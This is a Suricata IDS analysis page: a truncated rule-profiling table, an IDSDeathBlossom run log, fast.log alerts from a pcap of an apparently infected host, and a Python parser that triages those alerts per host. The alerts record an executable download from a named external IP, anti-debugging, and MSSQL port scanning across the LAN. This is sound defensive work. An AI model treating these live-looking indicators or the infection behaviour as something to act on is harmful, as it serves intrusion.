  30       2016503      1        2        2505419      0.31   160      0        336760      15658.87    0.00        15658.87   
  31       2819664      1        2        16974067     2.12   112      0        328910      151554.17   0.00        151554.17  
  32       2807400      1        3        1012539      0.13   15       0        328517      67502.60    0.00        67502.60   
  33       2805985      1        2        1000166      0.12   15       0        325988      66677.73    0.00        66677.73   
  34       2018982      1        2        945325       0.12   15       0        325594      63021.67    0.00        63021.67   
  35       2819930      1        2        17045021     2.13   112      0        323397      152187.69   0.00        152187.69  
  36       2022050      1        3        924894       0.12   15       0        323038      61659.60    0.00        61659.60   
  37       2808234      1        1        954083       0.12   15       0        322986      63605.53    0.00        63605.53   
  38       2016948      1        2        2316071      0.29   138      0        312161      16783.12    0.00        16783.12   
  39       2804911      1        3        2354615      0.29   40       0        297865      58865.38    0.00        58865.38   
  40       2016143      1        3        2492126      0.31   147      0        295761      16953.24    0.00        16953.24   
  41       2806802      1        2        9479220      1.18   452      0        257352      20971.73    0.00        20971.73   
  42       2804906      1        3        2104405      0.26   32       0        251086      65762.66    0.00        65762.66   
  43       2807130      1        4        3595003      0.45   215      0        227064      16720.94    0.00        16720.94   
  44       2016537      1        2        14944310     1.86   1032     1        225618      14480.92    57983.00    14438.73   
  45       2024771      1        1        10801849     1.35   1758     0        216847      6144.40     0.00        6144.40    
  46       2811745      1        4        886696       0.11   8        0        214208      110837.00   0.00        110837.00  
  47       2018789      1        3        351098       0.04   6        0        186364      58516.33    0.00        58516.33   
  48       2016855      1        2        377295       0.05   11       0        181304      34299.55    0.00        34299.55   
  49       2017552      1        6        14874246     1.86   1045     0        165532      14233.73    0.00        14233.73   
  50       2016854      1        3        388861       0.05   11       0        147275      35351.00    0.00        35351.00   
  51       2024829      1        2        3337365      0.42   160      0        145785      20858.53    0.00        20858.53   
  52       2023476      1        5        132644       0.02   1        0        132644      132644.00   0.00        132644.00  
  53       2815314      1        3        540737       0.07   5        0        127796      108147.40   0.00        108147.40  
  54       2827094      1        2        1124571      0.14   14       0        121474      80326.50    0.00        80326.50   
  55       2021749      1        6        135057       0.02   6        0        120846      22509.50    0.00        22509.50   
  56       2819857      1        1        434559       0.05   15       0        120312      28970.60    0.00        28970.60   
  57       2014819      1        3        199674       0.02   3        0        119854      66558.00    0.00        66558.00   
  58       2021432      1        2        119680       0.01   1        0        119680      119680.00   0.00        119680.00  
  59       2021434      1        2        119294       0.01   1        0        119294      119294.00   0.00        119294.00  
  60       2021586      1        3        119161       0.01   1        0        119161      119161.00   0.00        119161.00  
  61       2021433      1        2        117750       0.01   1        0        117750      117750.00   0.00        117750.00  
  62       2017748      1        6        2966427      0.37   196      0        117470      15134.83    0.00        15134.83   
  63       2024909      1        2        2792879      0.35   129      0        116382      21650.22    0.00        21650.22   
  64       2803139      1        3        180211       0.02   3        0        116041      60070.33    0.00        60070.33   
  65       2012981      1        5        187380       0.02   3        0        109779      62460.00    0.00        62460.00   
  66       2828748      1        2        323229       0.04   63       0        102383      5130.62     0.00        5130.62    
  67       2829607      1        1        88350        0.01   1        1        88350       88350.00    88350.00    0.00       
  68       2023671      1        4        912985       0.11   61       0        87797       14966.97    0.00        14966.97   
  69       2016141      1        5        75302        0.01   1        1        75302       75302.00    75302.00    0.00       
  70       2018316      1        4        166660       0.02   3        0        74766       55553.33    0.00        55553.33   
  71       2013352      1        4        249773       0.03   61       0        74002       4094.64     0.00        4094.64    
  72       2019714      1        10       73044        0.01   1        1        73044       73044.00    73044.00    0.00       
  73       2023672      1        4        890583       0.11   61       0        71566       14599.72    0.00        14599.72   
  74       2806561      1        5        38608936     4.82   13793    0        69515       2799.17     0.00        2799.17    
  75       2001330      1        8        5192050      0.65   1732     0        67563       2997.72     0.00        2997.72    
  76       2022896      1        5        67431        0.01   1        0        67431       67431.00    0.00        67431.00   
  77       2816530      1        2        66531        0.01   1        0        66531       66531.00    0.00        66531.00   
  78       2018241      1        2        277529       0.03   61       0        66233       4549.66     0.00        4549.66    
  79       2022550      1        16       65308        0.01   1        0        65308       65308.00    0.00        65308.00   
  80       2814978      1        2        81965        0.01   7        0        65048       11709.29    0.00        11709.29   
  81       2024776      1        1        275131       0.03   70       0        64873       3930.44     0.00        3930.44    
  82       2024848      1        2        181347       0.02   4        0        64849       45336.75    0.00        45336.75   
  83       2022830      1        2        64394        0.01   1        0        64394       64394.00    0.00        64394.00   
  84       2017190      1        6        64220        0.01   1        0        64220       64220.00    0.00        64220.00   
  85       2008120      1        4        107953       0.01   17       0        60882       6350.18     0.00        6350.18    
  86       2022940      1        2        60342        0.01   1        0        60342       60342.00    0.00        60342.00   
  87       2814888      1        2        198474       0.02   5        0        59519       39694.80    0.00        39694.80   
  88       2821615      1        2        188613       0.02   6        0        58964       31435.50    0.00        31435.50   
  89       2814979      1        2        76096        0.01   7        0        58471       10870.86    0.00        10870.86   
  90       2022552      1        2        4263863      0.53   210      0        58456       20304.11    0.00        20304.11   
  91       2022658      1        4        57034        0.01   1        0        57034       57034.00    0.00        57034.00   
  92       2015744      1        4        88455        0.01   12       1        55890       7371.25     55890.00    2960.45    
  93       2018005      1        6        70060        0.01   6        0        54730       11676.67    0.00        11676.67   
  94       2822886      1        2        102882       0.01   3        0        53938       34294.00    0.00        34294.00   
  95       2018959      1        3        233224       0.03   61       1        53354       3823.34     53354.00    2997.83    
  96       2811275      1        8        144775       0.02   4        0        51992       36193.75    0.00        36193.75   
  97       2021067      1        2        156764       0.02   4        0        51541       39191.00    0.00        39191.00   
  98       2018121      1        4        51210        0.01   1        0        51210       51210.00    0.00        51210.00   
  99       2022535      1        11       50127        0.01   1        0        50127       50127.00    0.00        50127.00   
  100      2008438      1        20       655361       0.08   15       0        49867       43690.73    0.00        43690.73   
  101      2810481      1        4        4010298      0.50   196      0        49766       20460.70    0.00        20460.70   
  102      2014701      1        12       229776       0.03   16       0        49742       14361.00    0.00        14361.00   
  103      2822213      1        2        63130        0.01   6        0        49515       10521.67    0.00        10521.67   
  104      2019103      1        4        944363       0.12   61       0        48854       15481.36    0.00        15481.36   
  105      2807385      1        5        291071       0.04   15       0        48751       19404.73    0.00        19404.73   
  106      2009897      1        14       87691        0.01   15       0        47974       5846.07     0.00        5846.07    
  107      2020421      1        2        883825       0.11   61       0        47331       14488.93    0.00        14488.93   
  108      2826256      1        2        341780       0.04   14       0        47014       24412.86    0.00        24412.86   
  109      2025142      1        2        181075       0.02   4        0        46986       45268.75    0.00        45268.75   
  110      2815481      1        6        169507       0.02   4        0        46644       42376.75    0.00        42376.75   
  111      2830124      1        1        46327        0.01   1        0        46327       46327.00    0.00        46327.00   
  112      2022270      1        2        46295        0.01   1        0        46295       46295.00    0.00        46295.00   
  113      2809306      1        4        3139546      0.39   217      0        45859       14467.95    0.00        14467.95   
  114      2021312      1        2        930117       0.12   61       0        45712       15247.82    0.00        15247.82   
  115      2019345      1        2        3321131      0.41   231      0        45707       14377.19    0.00        14377.19   
  116      2014353      1        6        222604       0.03   61       0        45219       3649.25     0.00        3649.25    
  117      2821561      1        2        298450       0.04   9        0        45091       33161.11    0.00        33161.11   
  118      2023464      1        2        864885       0.11   61       0        44638       14178.44    0.00        14178.44   
  119      2815749      1        2        151534       0.02   4        0        44366       37883.50    0.00        37883.50   
  120      2014471      1        6        44349        0.01   1        0        44349       44349.00    0.00        44349.00   
  121      2811390      1        2        166177       0.02   5        0        44062       33235.40    0.00        33235.40   
  122      2022053      1        2        867794       0.11   61       0        44007       14226.13    0.00        14226.13   
  123      2819649      1        3        881210       0.11   61       0        43940       14446.07    0.00        14446.07   
  124      2021068      1        2        43616        0.01   1        1        43616       43616.00    43616.00    0.00       
  125      2023711      1        2        87

This file has been truncated.


IDSDeathBlossom.py.log - (1147 bytes)
2019-04-03 13:39:57,968 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-04-03 13:39:58,705 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-04-03 13:39:58,705 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-04-03 13:39:58,705 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-04-03 13:39:58,705 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-04-03 13:39:58,706 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/cfcab331f081527fd30a5330ac5c8df556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/04032019.1339-network.pcap -vvv -k none
2019-04-03 13:40:21,274 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-04-03 13:40:21,275 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 23.3142771721


suricata-4.0.0-etpro-all-alert-2019-04-03-T-13-40-21-04032019.1339-network.pcap.txt - (3563 bytes)
03/29/2019-09:49:34.388290  [**] [1:2811058:2] ETPRO POLICY External IP Lookup - ip.42.pl [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:34.388290  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:36.272085  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49429 -> 45.79.77.20:80
03/29/2019-09:49:36.699781  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49430 -> 153.92.4.49:80
03/29/2019-09:49:37.163101  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.290041  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:37.290041  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:34.165698  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49687 -> 192.168.0.1:1433
03/29/2019-09:49:37.644459  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49688 -> 192.168.0.2:1433
03/29/2019-09:49:37.644675  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49689 -> 192.168.0.6:1433
03/29/2019-09:49:34.165907  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49690 -> 192.168.0.5:1433
03/29/2019-09:49:34.165925  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49691 -> 192.168.0.3:1433
03/29/2019-09:49:37.689490  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:49719 -> 192.168.0.52:1433
03/29/2019-09:49:38.528631  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:50:33.979260  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:52365 -> 8.8.8.62:1433
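As an added example (not part of the page, of IDSDeathBlossom or of Suricata), here is a parser for the fast.log alert lines above that pulls out gid/sid/rev, message, classification, priority and endpoints, then triages per host: which hosts fanned out to many distinct destinations on one port, and which were an endpoint of an alert about a Windows executable. The sample input is a subset of the alert lines from this page's alert file, copied rather than constructed. The keyword list in `EXE_MSG_RE` and the fan-out threshold of 3 destinations are heuristics chosen for this example, not anything Suricata or the ET ruleset defines. IPv4 only; IPv6 alerts contain ':' in the address and would need a different endpoint split.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# One fast.log record: timestamp, [gid:sid:rev], message, classification,
# priority, protocol and the endpoints. Ports are optional because ICMP alerts
# carry none. IPv4 only (assumption for this example).
FAST_LOG_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d{1,6})\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"\[Classification:\s+(?P<classification>[^\]]+)\]\s+"
    r"\[Priority:\s+(?P<priority>\d+)\]\s+\{(?P<proto>[^}]+)\}\s+"
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dport>\d+))?\s*$"
)

# Heuristic chosen for this example: words in the rule message that mark an
# alert as being about a Windows executable crossing the wire.
EXE_MSG_RE = re.compile(r"\b(?:EXE|Executable|MZ)\b")

# Subset of the alert lines from the page's fast.log output (copied, not constructed).
SAMPLE_FAST_LOG = """\
03/29/2019-09:49:34.388290  [**] [1:2811058:2] ETPRO POLICY External IP Lookup - ip.42.pl [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:34.388290  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:37.163101  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.290041  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:34.165698  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49687 -> 192.168.0.1:1433
03/29/2019-09:49:37.644459  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49688 -> 192.168.0.2:1433
03/29/2019-09:49:37.644675  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49689 -> 192.168.0.6:1433
03/29/2019-09:49:34.165925  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49691 -> 192.168.0.3:1433
03/29/2019-09:50:33.979260  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:52365 -> 8.8.8.62:1433
"""


def parse_fast_log(text):
    """Return one dict per alert line; raise on a line the pattern does not cover."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = FAST_LOG_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: not a fast.log record: {line!r}")
        a = m.groupdict()
        a["ts"] = datetime.strptime(a["ts"], "%m/%d/%Y-%H:%M:%S.%f")
        for key in ("gid", "sid", "rev", "priority"):
            a[key] = int(a[key])
        for key in ("sport", "dport"):
            a[key] = int(a[key]) if a[key] is not None else None
        alerts.append(a)
    return alerts


def timeline(alerts):
    """Alerts in timestamp order. The page's file is written in detection order,
    not time order (the 09:49:34 MSSQL alerts follow the 09:49:37 HTTP ones),
    so sort before reasoning about what happened first."""
    return sorted(alerts, key=lambda a: a["ts"])


def summarise_hosts(alerts, scan_threshold=3):
    """Per host: sids it triggered as source, distinct destinations per destination
    port, ports on which it reached >= scan_threshold distinct destinations, and
    whether it was either endpoint of an executable-related alert."""
    hosts = defaultdict(lambda: {"sids": set(), "fanout": defaultdict(set),
                                 "scan_ports": [], "exe_transfer": False,
                                 "private": False})
    for a in alerts:
        h = hosts[a["src"]]
        h["sids"].add(a["sid"])
        if a["dport"] is not None:
            h["fanout"][a["dport"]].add(a["dst"])
        if EXE_MSG_RE.search(a["msg"]):
            for ip in (a["src"], a["dst"]):
                hosts[ip]["exe_transfer"] = True
    for ip, h in hosts.items():
        h["private"] = ipaddress.ip_address(ip).is_private
        h["scan_ports"] = sorted(port for port, dsts in h["fanout"].items()
                                 if len(dsts) >= scan_threshold)
    return dict(hosts)


def suspects(summary):
    """Internal (RFC 1918) hosts that both touched an executable and fanned out."""
    return sorted(ip for ip, h in summary.items()
                  if h["private"] and h["exe_transfer"] and h["scan_ports"])


if __name__ == "__main__":
    alerts = parse_fast_log(SAMPLE_FAST_LOG)
    for a in timeline(alerts):
        print(a["ts"].time(), a["sid"], a["src"], "->", a["dst"], a["dport"], a["msg"])
    summary = summarise_hosts(alerts)
    for ip in suspects(summary):
        h = summary[ip]
        print(ip, {p: len(h["fanout"][p]) for p in h["scan_ports"]}, sorted(h["sids"]))
```

Run against the full alert file, the summary singles out 192.168.240.16: it is the client in the Python-urllib and external-IP-lookup alerts, the receiver of the PE download from 27.102.130.126, and the source of the port 1433 fan-out across 192.168.0.0/24 (and, later, toward 8.8.8.62). Priority 1 is the highest in the ET classification scheme. fast.log is only the one-line summary; the matching eve.json records carry the HTTP URL, user agent and file hashes needed to go further.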